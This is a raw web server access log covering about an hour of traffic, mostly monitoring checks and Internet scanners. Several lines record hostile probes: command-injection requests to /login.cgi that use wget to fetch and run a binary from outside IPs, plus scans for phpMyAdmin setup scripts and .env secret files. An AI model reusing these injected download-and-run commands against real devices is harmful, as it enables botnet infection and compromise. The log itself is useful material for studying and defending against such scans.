193.42.33.140 - - [02/Mar/2023:20:47:06 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:06 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:06 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:06 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:07 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:07 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:20:47:07 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.32.162.159 - - [02/Mar/2023:20:47:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Mar/2023:20:47:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.8 - - [02/Mar/2023:20:48:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.8 - - [02/Mar/2023:20:48:29 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.8 - - [02/Mar/2023:20:48:29 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.9 - - [02/Mar/2023:20:48:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.9 - - [02/Mar/2023:20:48:34 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.9 - - [02/Mar/2023:20:48:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Mar/2023:20:48:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:49:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.58.221.52 - - [02/Mar/2023:20:50:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [02/Mar/2023:20:50:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:51:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.131.24 - - [02/Mar/2023:20:51:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Mar/2023:20:52:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:53:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:54:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:55:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.89.5.116 - - [02/Mar/2023:20:56:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2023:20:56:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:57:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:58:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:20:59:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:00:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:01:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.225.64.129 - - [02/Mar/2023:21:02:20 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Mar/2023:21:02:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:03:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:04:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.61 - - [02/Mar/2023:21:05:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.61 - - [02/Mar/2023:21:05:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.61 - - [02/Mar/2023:21:05:07 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.61 - - [02/Mar/2023:21:05:07 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Mar/2023:21:05:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:06:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.32.134.31 - - [02/Mar/2023:21:07:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2023:21:07:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.89.5.98 - - [02/Mar/2023:21:08:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2023:21:08:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:09:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:10:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.91.47.43 - - [02/Mar/2023:21:11:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Mar/2023:21:11:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:12:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.155.126.211 - - [02/Mar/2023:21:13:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
172.104.131.24 - - [02/Mar/2023:21:13:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Mar/2023:21:13:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:50 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:51 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:51 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:51 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:52 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:52 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:52 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:52 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:53 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:13:53 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
223.165.109.115 - - [02/Mar/2023:21:14:01 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
223.165.109.115 - - [02/Mar/2023:21:14:02 +0100] "POST /conf HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:21:14:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:15:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:16:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:17:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:18:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:19:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:20:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:21:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.14.33.25 - - [02/Mar/2023:21:21:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2023:21:22:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.148.4 - - [02/Mar/2023:21:23:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
68.183.148.4 - - [02/Mar/2023:21:23:44 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.89/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
212.91.246.72 - - [02/Mar/2023:21:23:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:24:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.128.224.204 - - [02/Mar/2023:21:25:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.128.224.204 - - [02/Mar/2023:21:25:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.128.224.204 - - [02/Mar/2023:21:25:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.224.204 - - [02/Mar/2023:21:25:27 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:21:25:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:26:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.60.60.186 - - [02/Mar/2023:21:27:06 +0100] "GET /client/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.60.60.186 - - [02/Mar/2023:21:27:07 +0100] "POST /client HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:21:27:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.42.33.140 - - [02/Mar/2023:21:28:16 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:16 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:16 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:16 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:16 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:17 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:17 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:17 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:17 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:17 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:17 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:18 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:18 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:18 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:18 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:18 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:19 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:19 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:21:28:19 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
212.91.246.72 - - [02/Mar/2023:21:28:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:30:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.158.37.156 - - [02/Mar/2023:21:32:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [02/Mar/2023:21:32:46 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:21:32:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:33:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.75.136.16 - - [02/Mar/2023:21:34:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
106.75.136.16 - - [02/Mar/2023:21:34:16 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:21:34:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:35:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:36:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.118.40.97 - - [02/Mar/2023:21:37:51 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
205.210.31.156 - - [02/Mar/2023:21:38:21 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [02/Mar/2023:21:38:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:39:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:40:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:41:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:42:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:43:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.182.120.198 - - [02/Mar/2023:21:44:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.182.120.198 - - [02/Mar/2023:21:44:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.182.120.198 - - [02/Mar/2023:21:44:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.182.120.198 - - [02/Mar/2023:21:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.182.120.198 - - [02/Mar/2023:21:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2023:21:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.182.120.198 - - [02/Mar/2023:21:44:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.80.32.78 - - [02/Mar/2023:21:45:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.180.143.140 - - [02/Mar/2023:21:45:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
95.182.120.198 - - [02/Mar/2023:21:45:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.180.143.140 - - [02/Mar/2023:21:45:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.140 - - [02/Mar/2023:21:45:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.140 - - [02/Mar/2023:21:45:22 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.140 - - [02/Mar/2023:21:45:33 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.140 - - [02/Mar/2023:21:45:43 +0100] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:21:45:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.182.120.198 - - [02/Mar/2023:21:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.182.120.198 - - [02/Mar/2023:21:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.182.120.198 - - [02/Mar/2023:21:46:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
69.194.182.218 - - [02/Mar/2023:21:46:33 +0100] "GET /uploads/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.194.182.218 - - [02/Mar/2023:21:46:33 +0100] "POST /uploads HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.194.182.218 - - [02/Mar/2023:21:46:43 +0100] "GET /uploads/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.194.182.218 - - [02/Mar/2023:21:46:43 +0100] "POST /uploads HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:21:46:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:21:47:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.35.151 - - [02/Mar/2023:21:48:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
198.235.24.29 - - [02/Mar/2023:21:48:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Mar/2023:21:48:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [02/Mar/2023:21:49:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
69.194.182.218 - - [02/Mar/2023:21:49:36 +0100] "GET /uploads/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.194.182.218 - - [02/Mar/2023:21:49:37 +0100] "POST /uploads HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
